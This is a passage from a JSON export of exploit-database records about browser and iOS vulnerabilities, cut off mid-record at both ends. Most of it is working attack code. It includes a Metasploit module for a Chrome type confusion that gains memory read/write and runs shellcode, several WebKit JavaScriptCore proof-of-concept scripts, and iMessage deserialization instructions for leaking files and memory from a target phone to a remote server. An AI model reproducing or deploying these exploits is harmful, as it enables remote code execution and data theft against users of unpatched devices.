o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(div_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n}\n\npwn();\n^\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n^\n\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34054", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-27T14:10:32", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-03T00:00:00", "type": "zdt", "title": "WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-04-03T00:00:00", "id": "1337DAY-ID-32484", "href": "https://0day.today/exploit/description/32484", "sourceData": "WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check\n\n/*\nWhile fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc in current HEAD and release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc on macOS):\n*/\n\n // Run with --thresholdForFTLOptimizeAfterWarmUp=1000\n\n // First array probably required to avoid COW backing storage or so...\n const v3 = [1337,1337,1337,1337];\n const v6 = [1337,1337];\n\n function v7(v8) {\n for (let v9 in v8) {\n v8.a = 42;\n const v10 = v8[-698666199];\n }\n }\n\n while (true) {\n const v14 = v7(v6);\n const v15 = v7(1337);\n }\n\n/*\nNote that the sample requires the FTL JIT threshold to be lowered in order to trigger. However, I also have a slightly modified version that (less reliably) crashes with the default threshold which I can share if that is helpful.\n\nFollowing is my preliminary analysis of the crash.\n\nDuring JIT compilation in the FTL tier, the JIT IR for v7 will have the following properties:\n\n* A Structure check will be inserted for v8 due to the property access. The check will ensure that the array is of the correct type at runtime (ArrayWithInt32, with a property 'a')\n* The loop header fetches the array length for the enumeration\n* The element access into v8 is (incorrectly?) speculated to be InBounds, presumably because negative numbers are not actually valid array indices but instead regular property names\n* As a result, the element access will be optimized into a CheckBounds node followed by a GetByVal node (both inside the loop body)\n* The CheckBounds node compares the constant index against the array length which was loaded in the loop header\n\nThe IR for the function will thus look roughly as follows:\n\n # Loop header\n len = LoadArrayLength v8\n // Do other loop header stuff\n\n # Loop body\n CheckStructure v8, expected_structure_id\n StoreProperty v8, 'a', 42\n CheckBounds -698666199, len // Bails out if index is OOB (always in this case...)\n GetByVal v8, -698666199 // Loads the element from the backing storage without performing additional checks\n\n // Jump back to beginning of loop\n\n\nHere is what appears to be happening next during loop-invariant code motion (LICM), an optimization designed to move code inside a loop body in front of the loop if it doesn't need to be executed multiple times:\n\n1. LICM determines that the CheckStructure node can be hoisted in front of the loop header and does so\n2. LICM determines that the CheckBounds node can *not* be hoisted in front of the loop header as it depends on the array length which is only loaded in the loop header\n3. LICM determines that the array access (GetByVal) can be hoisted in front of the loop (as it does not depend on any loop variables) and does so\n\nAs a result of the above, the IR is transformed roughly to the following:\n\n StructureCheck v8, expected_structure_id\n GetByVal v8, -698666199\n\n # Loop header\n len = LoadArrayLength v8\n // Do other loop header stuff\n\n # Loop body\n StoreProperty v8, 'a', 42\n CheckBounds -698666199, len\n\n // Jump back to beginning of loop\n\nAs such, the (unchecked) array element access is now located before the loop header with the bounds check only happening afterwards inside the loop body. The provided PoC then crashes while accessing memory 698666199 * 8 bytes before the element vector for v6. It should be possible to turn this bug into arbitrary out-of-bounds access, but I haven't tried that.\n\nHoisting of GetByVal will only happen if safeToExecute (from DFGSafeToExecute.h) returns true. This function appears to only be concerned about type checks, so in this case it concludes that the GetByVal can be moved in front of the loop header as the StructureCheck (performing the type check) is also moved there. This seems to be the reason that the property store (v8.a = 42) is required as it forces a CheckStructure node which would otherwise be missing.\n\nThe invocations of v7 with a non-array argument (1337 in this case) seem to be necessary to not trigger a bailout in earlier JIT tiers too often, which would prevent the FTL JIT from ever compiling the function.\n*/\n", "sourceHref": "https://0day.today/exploit/32484", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-04T16:12:21", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-17T00:00:00", "type": "zdt", "title": "WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4442"], "modified": "2019-01-17T00:00:00", "id": "1337DAY-ID-31982", "href": "https://0day.today/exploit/description/31982", "sourceData": "/*\nThe doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF.\n\nPoC:\n*/\n\nfunction gc() {\n for (let i = 0; i < 10; i++) {\n new ArrayBuffer(1024 * 1024 * 10);\n }\n}\n\nfunction opt(arr) {\n let r = /a/;\n let o = {};\n\n arr[0].charAt(0);\n arr[1].charAt(0);\n arr[2].charAt(0);\n arr[3].charAt(0);\n arr[4].charAt(0);\n arr[5].charAt(0);\n arr[6].charAt(0);\n arr[7].charAt(0);\n arr[8].charAt(0);\n arr[8].charAt(0);\n arr[9].charAt(0);\n\n o.x = 'a'.match(r);\n\n return o;\n}\n\nfunction main() {\n for (let i = 0; i < 10000; i++) {\n opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);\n }\n\n let a = 'a'.repeat(1024 * 1024 * 2);\n let b = 'a'.repeat(1024 * 1024 * 2);\n\n let arr = [];\n for (let i = 0; i < 10; i++) {\n arr[i] = a + b;\n }\n\n gc();\n\n let o = opt(arr);\n\n gc();\n\n let tmp = [1234];\n\n print(o.x); // 1234\n}\n\nmain();\n", "sourceHref": "https://0day.today/exploit/31982", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T12:56:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-13T00:00:00", "type": "zdt", "title": "WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2018-12-13T00:00:00", "id": "1337DAY-ID-31778", "href": "https://0day.today/exploit/description/31778", "sourceData": "\n\n<body>\n<script>\n\nfunction opt(arr, arr2) {\n arr[1] = 1.1;\n\n let tmp = 0 in arr2;\n\n arr[0] = 2.3023e-320;\n\n return tmp;\n}\n\nfunction main() {\n let o = document.body.appendChild(document.createElement('iframe')).contentWindow;\n\n // haveABadTime\n o.eval(`\nlet p = new Proxy({}, {});\nlet a = {__proto__: {}};\na.__proto__.__proto__ = p;\n`);\n\n let arr = [1.1, 2.2];\n let arr2 = [1.1, 2.2];\n\n let proto = new o.Object();\n let handler = {};\n\n arr2.__proto__ = proto;\n proto.__proto__ = new Proxy({}, {\n has() {\n arr[0] = {};\n\n return true;\n }\n });\n\n for (let i = 0; i < 10000; i++) {\n opt(arr, arr2);\n }\n\n setTimeout(() => {\n delete arr2[0];\n\n opt(arr, arr2);\n\n alert(arr[0]);\n }, 500);\n}\n\nmain();\n\n</script>\n</body>\n", "sourceHref": "https://0day.today/exploit/31778", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-26T23:07:25", "description": "WebKit suffers from a JSC JSArray::appendMemcpy uninitialized memory copy vulnerability.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "1337DAY-ID-28183", "href": "https://0day.today/exploit/description/28183", "sourceData": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \r\n\r\nCVE-2017-7064\r\n\r\n\r\nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of JSArray::appendMemcpy.\r\n\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\nPoC:\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-01-26] #", "sourceHref": "https://0day.today/exploit/28183", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-12-04T15:58:18", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-07-30T00:00:00", "type": "zdt", "title": "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8646"], "modified": "2019-07-30T00:00:00", "id": "1337DAY-ID-33062", "href": "https://0day.today/exploit/description/33062", "sourceData": "The class _NSDataFileBackedFuture can be deserialized even if secure encoding is enabled. This class is a file-backed NSData object that loads a local file into memory when the [NSData bytes] selector is called. This presents two problems. First, it could potentially allow undesired access to local files if the code deserializing the buffer ever shares it (this is more likely to cause problems in components that use serialized objects to communicate locally than in iMessage). Second, it allows an NSData object to be created with a length that is different than the length of its byte array. This violates a very basic property that should always be true of NSData objects. This can allow out of bounds reads, and could also potentially lead to out-of-bounds writes, as it is now possible to create NSData objects with very large sizes that would not be possible if the buffer was backed.\n\nTo reproduce the issue with the files in filebacked.zip:\n\n1) install frida (pip3 install frida)\n2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device\n3) in injectMessage.js replace the marker \"PATH\" with the path of the obj file\n4) in the local directory, run:\n\npython3 sendMessage.py\n\nPlease note that the attached repro case is a simple example to demonstrate the reach-ability of the class in Springboard. The actual consequences of the bug are likely more serious. This PoC only works on devices with iOS 12 or later. \n\n\nI've written up a PoC of this issue leaking memory from a remote device. To use the PoC, replace all instances of \"natashenka.party\" in the attached files with the domain of the server you are using to reproduce the issue. Then run myserver.py on the server, and use the files in filebackedleak.zip to send a message to a target device, using the instructions in the issue above. Leaked bytes of memory from Springboard in the target device will be displayed in the output of myserver.py.\n\nA quick summary of how this PoC works:\n\n1) iMessage attempts to decode the object in the file obj to display the message notification\n2) A _NSDataFileBackedFuture instance is decoded, with a fileURL of http://natashenka.party//System/Library/ColorSync/Resources/ColorTables.data and a long length.\n3) An ACZeroingString instance is decoded, using the previous _NSDataFileBackedFuture as its bytes. When the bytes are accessed, they will be fetched from the above URL. The _NSDataFileBackedFuture class attempts to prevent remote URLs from being fetched by checking that the path of the URL exists on the system, but it does not check the scheme, so a remote URL can be fetched so long as its path component is a path that exists on the filesystem\n4) The remote server responds with a buffer that contains the URL http://natashenka.party//System/Library/ColorSync/Resources/ColorTables.data?val=a. Since the length of the _NSDataFileBackedFuture is long, this will lead to a buffer that contains the URL as well as some unallocated, uninitialized memory\n5) Unfortunately, it is not possible to leak the memory by accessing the URL with the leaked memory created in step 4 using another _NSDataFileBackedFuture at this stage, because the NSURL class greatly restricts the characters allowed in a URL, so it is necessary to bypass these checks. It is possible to do this with the INDeferredLocalizedString class, which is a string that can have different values based on localization\n6) An INDeferredLocalizedString instance is decoded with one property being a string that is a legal URL, and the other being the string with the invalid characters. There is a cycle in initialization that causes an NSURL instance to be initialized using the valid string, but then the string moves into a state where it will return the invalid characters when the NSURL is used.\n7) A _NSDataFileBackedFuture is used to access the URL, and the leaked bytes are send to the server as the URL parameter\n\n\nI've got this issue to read files from a remote device. To use the PoC, replace all instances of \"natashenka.party\" in the attached files with the domain of the server you are using to reproduce the issue. Then run myserver.py on the server, and use the files in messageleak.zip to send a message to a target device, using the instructions in the issue above. There are two possible objects to send the device:\n\nobj_db: sends back the file in an escaped format that omits nulls. Good for leaking the SMS database\nobj_image: sends back the file in a url encoded format. Good for leaking binary files like images\n\nThe file contents will be output on the commandline of myserver.py. There are some length limits in the server file that can be removed to see more data. The server will also output a file named 'buf'. Processing this file with uni.py (requires python3) will output the file. This only works with the the obj_image object.\n\nThis PoC works similarly to the one above, but it encodes the string by using the formatting options in INDeferredLocalizedString.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47194.zip\n", "sourceHref": "https://0day.today/exploit/33062", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-03-06T22:52:32", "description": "", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-17463"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156640", "href": "https://packetstormsecurity.com/files/156640/Google-Chrome-67-68-69-Object.create-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit', \n'Description' => %q{ \nThis modules exploits a type confusion in Google Chromes JIT compiler. \nThe Object.create operation can be used to cause a type confusion between a \nPropertyArray and a NameDictionary. \nThe payload is executed within the rwx region of the sandboxed renderer \nprocess, so the browser must be run with the --no-sandbox option for the \npayload to work. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'saelo', # discovery and exploit \n'timwr', # metasploit module \n], \n'References' => [ \n['CVE', '2018-17463'], \n['URL', 'http://www.phrack.org/papers/jit_exploitation.html'], \n['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'], \n['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'], \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => ['windows', 'osx'], \n'DefaultTarget' => 0, \n'Targets' => [ [ 'Automatic', { } ] ], \n'DisclosureDate' => 'Sep 25 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \n \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] \" + request.body) \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \n \njscript = %Q^ \nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]); \n \nlet ab = new ArrayBuffer(8); \nlet floatView = new Float64Array(ab); \nlet uint64View = new BigUint64Array(ab); \nlet uint8View = new Uint8Array(ab); \n \nNumber.prototype.toBigInt = function toBigInt() { \nfloatView[0] = this; \nreturn uint64View[0]; \n}; \n \nBigInt.prototype.toNumber = function toNumber() { \nuint64View[0] = this; \nreturn floatView[0]; \n}; \n \nfunction hex(n) { \nreturn '0x' + n.toString(16); \n}; \n \nfunction fail(s) { \nprint('FAIL ' + s); \nthrow null; \n} \n \nconst NUM_PROPERTIES = 32; \nconst MAX_ITERATIONS = 100000; \n \nfunction gc() { \nfor (let i = 0; i < 200; i++) { \nnew ArrayBuffer(0x100000); \n} \n} \n \nfunction make(properties) { \nlet o = {inline: 42} // TODO \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \neval(`o.p${i} = properties[${i}];`); \n} \nreturn o; \n} \n \nfunction pwn() { \nfunction find_overlapping_properties() { \nlet propertyNames = []; \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \npropertyNames[i] = `p${i}`; \n} \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \n${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')} \nreturn [${propertyNames.join(', ')}]; \n} \n`); \n \nlet propertyValues = []; \nfor (let i = 1; i < NUM_PROPERTIES; i++) { \npropertyValues[i] = -i; \n} \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \nlet r = vuln(make(propertyValues)); \nif (r[1] !== -1) { \nfor (let i = 1; i < r.length; i++) { \nif (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) { \nreturn [i, -r[i]]; \n} \n} \n} \n} \n \nfail(\"Failed to find overlapping properties\"); \n} \n \nfunction addrof(obj) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nreturn o.p${p1}.x1; \n} \n`); \n \nlet propertyValues = []; \npropertyValues[p1] = {x1: 13.37, x2: 13.38}; \npropertyValues[p2] = {y1: obj}; \n \nlet i = 0; \nfor (; i < MAX_ITERATIONS; i++) { \nlet res = vuln(make(propertyValues)); \nif (res !== 13.37) \nreturn res.toBigInt() \n} \n \nfail(\"Addrof failed\"); \n} \n \nfunction corrupt_arraybuffer(victim, newValue) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nlet orig = o.p${p1}.x2; \no.p${p1}.x2 = ${newValue.toNumber()}; \nreturn orig; \n} \n`); \n \nlet propertyValues = []; \nlet o = {x1: 13.37, x2: 13.38}; \npropertyValues[p1] = o; \npropertyValues[p2] = victim; \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \no.x2 = 13.38; \nlet r = vuln(make(propertyValues)); \nif (r !== 13.38) \nreturn r.toBigInt(); \n} \n \nfail(\"Corrupt ArrayBuffer failed\"); \n} \n \nlet [p1, p2] = find_overlapping_properties(); \nprint(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`); \n \nlet memview_buf = new ArrayBuffer(1024); \nlet driver_buf = new ArrayBuffer(1024); \n \ngc(); \n \nlet memview_buf_addr = addrof(memview_buf); \nmemview_buf_addr--; \nprint(`ArrayBuffer @ ${hex(memview_buf_addr)}`); \n \nlet original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr); \n \nlet driver = new BigUint64Array(driver_buf); \nlet original_memview_buf_ptr = driver[4]; \n \nlet memory = { \nwrite(addr, bytes) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nmemview.set(bytes); \n}, \nread(addr, len) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nreturn memview.subarray(0, len); \n}, \nreadPtr(addr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nreturn memview[0]; \n}, \nwritePtr(addr, ptr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nmemview[0] = ptr; \n}, \naddrof(obj) { \nmemview_buf.leakMe = obj; \nlet props = this.readPtr(memview_buf_addr + 8n); \nreturn this.readPtr(props + 15n) - 1n; \n}, \n}; \n \n// Generate a RWX region for the payload \nfunction get_wasm_instance() { \nvar buffer = new Uint8Array([ \n0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0, \n1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128, \n128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104, \n101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11 \n]); \nreturn new WebAssembly.Instance(new WebAssembly.Module(buffer),{}); \n} \n \nlet wasm_instance = get_wasm_instance(); \nlet wasm_addr = memory.addrof(wasm_instance); \nprint(\"wasm_addr @ \" + hex(wasm_addr)); \nlet wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n); \nprint(\"wasm_rwx @ \" + hex(wasm_rwx_addr)); \n \nmemory.write(wasm_rwx_addr, shellcode); \n \nlet fake_vtab = new 